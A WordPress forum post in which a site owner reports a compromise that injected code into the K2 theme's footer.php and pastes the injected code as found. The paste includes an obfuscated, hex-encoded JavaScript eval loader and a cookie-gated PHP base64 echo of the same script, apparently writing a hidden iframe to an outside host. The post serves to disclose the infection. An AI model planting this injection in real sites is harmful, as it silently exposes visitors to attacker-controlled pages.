WordPress.org

Ready to get started?Download WordPress

Forums

yahg vunerability again (1 post)

  1. lprent
    Member
    Posted 5 years ago #

    The yagh bug referred to here just happened in my wordpress system running 2.5.1 in a different form. This previously happened on the previous 2.3.x system back in March exactly like the description in the link above.

    The server is running a FC6 fedora with apache and very limited server access. It modified the active theme's footer.php.

    The generated output was :-

    </div> <!-- .content -->
    
    	<script>function
        EE28C5BB86B6E59028669F5CDC87F6F8(CF2908786055451B){return(parseInt(
        CF2908786055451B,16));}function E417D2B635CB5916ED753C59F6166C(
        DCCEDD4FB8B32634B73){function DE1B365014D0708B785C319(){var
        EE79D2C759494C6B00D1F4FDC747343=2;return EE79D2C759494C6B00D1F4FDC747343;}var
        E60247718C17F3D8F853817B5="";for(C9B1DAB222ED47955E124DB6F83A9=0;
        C9B1DAB222ED47955E124DB6F83A9<DCCEDD4FB8B32634B73.length;
        C9B1DAB222ED47955E124DB6F83A9+=DE1B365014D0708B785C319()){
        E60247718C17F3D8F853817B5+=( String.fromCharCode(
        EE28C5BB86B6E59028669F5CDC87F6F8(DCCEDD4FB8B32634B73.substr(
        C9B1DAB222ED47955E124DB6F83A9,DE1B365014D0708B785C319()))));}eval(
        E60247718C17F3D8F853817B5);}E417D2B635CB5916ED753C59F6166C("
        646F63756D656E742E777269746528223C696672616D65207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E22293B
        ");</script>
    	<div class
        ="clear"></div>
    </div> <!-- Close
    Page -->

    It attached itself to the top of the K2 theme footer.php.

    <?php
    if (!isset($_COOKIE["yahg"])) echo base64_decode('PHNjcmlwdD5mdW5jdGlvbiBFRTI4QzVCQjg2QjZFNTkwMjg2NjlGNUNEQzg3RjZGOChDRjI5MDg3ODYwNTU0NTFCKXtyZXR1cm4ocGFyc2VJbnQoQ0YyOTA4Nzg2MDU1NDUxQiwxNikpO31mdW5jdGlvbiBFNDE3RDJCNjM1Q0I1OTE2RUQ3NTNDNTlGNjE2NkMoRENDRURENEZCOEIzMjYzNEI3Myl7ZnVuY3Rpb24gREUxQjM2NTAxNEQwNzA4Qjc4NUMzMTkoKXt2YXIgRUU3OUQyQzc1OTQ5NEM2QjAwRDFGNEZEQzc0NzM0Mz0yO3JldHVybiBFRTc5RDJDNzU5NDk0QzZCMDBEMUY0RkRDNzQ3MzQzO312YXIgRTYwMjQ3NzE4QzE3RjNEOEY4NTM4MTdCNT0iIjtmb3IoQzlCMURBQjIyMkVENDc5NTVFMTI0REI2RjgzQTk9MDtDOUIxREFCMjIyRUQ0Nzk1NUUxMjREQjZGODNBOTxEQ0NFREQ0RkI4QjMyNjM0QjczLmxlbmd0aDtDOUIxREFCMjIyRUQ0Nzk1NUUxMjREQjZGODNBOSs9REUxQjM2NTAxNEQwNzA4Qjc4NUMzMTkoKSl7RTYwMjQ3NzE4QzE3RjNEOEY4NTM4MTdCNSs9KCBTdHJpbmcuZnJvbUNoYXJDb2RlKEVFMjhDNUJCODZCNkU1OTAyODY2OUY1Q0RDODdGNkY4KERDQ0VERDRGQjhCMzI2MzRCNzMuc3Vic3RyKEM5QjFEQUIyMjJFRDQ3OTU1RTEyNERCNkY4M0E5LERFMUIzNjUwMTREMDcwOEI3ODVDMzE5KCkpKSkpO31ldmFsKEU2MDI0NzcxOEMxN0YzRDhGODUzODE3QjUpO31FNDE3RDJCNjM1Q0I1OTE2RUQ3NTNDNTlGNjE2NkMoIjY0NkY2Mzc1NkQ2NTZFNzQyRTc3NzI2OTc0NjUyODIyM0M2OTY2NzI2MTZENjUyMDczNzI2MzNENjg3NDc0NzAzQTJGMkY2NzczNzQ2MTc0NzMyRTYzNkUyMDczNzQ3OTZDNjUzRDY0Njk3MzcwNkM2MTc5M0E2RTZGNkU2NTNFM0MyRjY5NjY3MjYxNkQ2NTNFMjIyOTNCIik7PC9zY3JpcHQ+');
     /* K2 Hook */ do_action('template_after_content'); ?>
    
    	<div class="clear"></div>
    </div> <!-- Close Page -->

    I have no idea how it modified the file. The date/time were the same as the offsite copy. Nothing else in the system was affected, so I'd guess that it was wordpress vunerability. Just bringing it to your attention.

Topic Closed

This topic has been closed to new replies.

About this Topic